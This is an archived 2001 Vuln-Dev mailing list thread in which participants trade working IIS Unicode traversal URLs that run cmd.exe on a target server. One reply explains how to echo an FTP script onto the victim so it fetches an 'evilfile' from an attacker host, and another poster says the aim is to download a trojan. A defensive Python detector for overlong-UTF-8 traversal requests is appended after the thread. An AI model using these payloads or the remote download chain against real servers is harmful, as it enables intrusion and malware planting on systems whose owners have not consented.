Vulnerability Development mailing list archives

Re: [unicode / iis4]


From: Ryan Yagatich <ryagatich () CSN1 COM>
Date: Tue, 9 Jan 2001 12:46:30 -0500

it doesn't matter where the system directory is, or the web directory. (the
whole point of /msdac)
let's assume the following:

z:\WINDOWS_NT  <--system root
u:\internet\web_root <--web root
since the msdac variant comes from program files\(i don't remember
exactly)\msdac you can still execute any commands you please no matter where
those directories are



ryan


-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of Tim H
Sent: Monday, January 08, 2001 11:00 AM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: [unicode / iis4]


Hi All,
A lot of these attacks assume that the web directory is on the same drive as
the system and that the system is in the winnt directory.  If neither of
these conditions are true, is this exploit still reasonable?

Thanks,
Tim

-----Original Message-----
From: white hat eagle [mailto:whitehateagle () USA NET]
Sent: Saturday, January 06, 2001 4:32 PM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: [unicode / iis4]


Hi folks,
in order to download a file by using mdac.pl or mdac2.pl or iis/unicode
exploit you should create a file, say, ftptmp.txt and you should issue
the following command
ftp -n -s:ftptmp.txt
where the -n switch will suppress the interactive logon mode and -s switch
will contain the commands and user credentials.
and the contents of the ftptmp.txt should be
open x.x.x.x [or the name of the ftp server]
user
anonymous
me () hacker com
bin
get evilfile
bye
to create this file you should use the "echo" command and redirect the
content to the file ftptmp.txt as follows
echo open x.x.x.x >ftptmp.txt && echo user >>ftptmp.txt.......
and so on.
good luck,
whe-

Mad Zigy <zigy () GLOBAL CO ZA> wrote:
Well i have been able to use msadc2.pl yet the commands i give do not work.
so i tried the other way by doing
http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test.txt
and all it did was say: The parameter is incorrect.
so then i thought maybe we can't have a > in the string so i found the hex of
it and tried
http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+test+%3e+c:\test.txt
yet it still gave me the same: The parameter is incorrect.
I have been able to make it ftp into my pc by
http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ftp+hostname
but i can't make it login as i need to echo a script which i can run
http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ftp+-s:c:\ftp.txt+hostname
so that it will login and download the exe / trojan
Thankz zigy!
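
A defender-side check for the request form quoted in this thread, added here as an example that is not part of any message in the thread: it folds overlong two-byte UTF-8 sequences such as `%c0%af` back to the ASCII byte they encode before testing a request path for traversal. The function names and the sample URIs are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

def fold_overlong(raw: bytes):
    """Fold overlong 2-byte UTF-8 forms (lead byte 0xC0 or 0xC1) to the ASCII
    byte they encode. Returns (folded_bytes, number_of_sequences_folded)."""
    out, hits, i = bytearray(), 0, 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            hits += 1
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out), hits

def classify(uri: str):
    """Return the reasons a request URI looks like the pattern in the thread."""
    path = uri.partition("?")[0]
    folded, overlong = fold_overlong(unquote_to_bytes(path))
    norm = folded.decode("latin-1").replace("\\", "/").lower()
    reasons = []
    if overlong:
        reasons.append("overlong-utf8")   # never produced by a conforming encoder
    if ".." in norm.split("/"):
        reasons.append("traversal")       # visible only after folding
    if re.search(r"/cmd\.exe$", norm):
        reasons.append("shell-binary")
    return reasons

# Constructed sample URIs; the first has the shape quoted in the thread.
SAMPLE_URIS = [
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ftp+hostname",
    "/default.asp?id=7",
    "/images/caf%c3%a9.gif",   # valid 2-byte UTF-8, must not be flagged
]

def scan(uris):
    """Map each suspicious URI to its list of reasons."""
    return {u: r for u in uris if (r := classify(u))}

if __name__ == "__main__":
    for uri, why in scan(SAMPLE_URIS).items():
        print(", ".join(why), uri)
```

The overlong test alone is the stronger signal, since a request path can contain one only if something deliberately encoded it that way.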


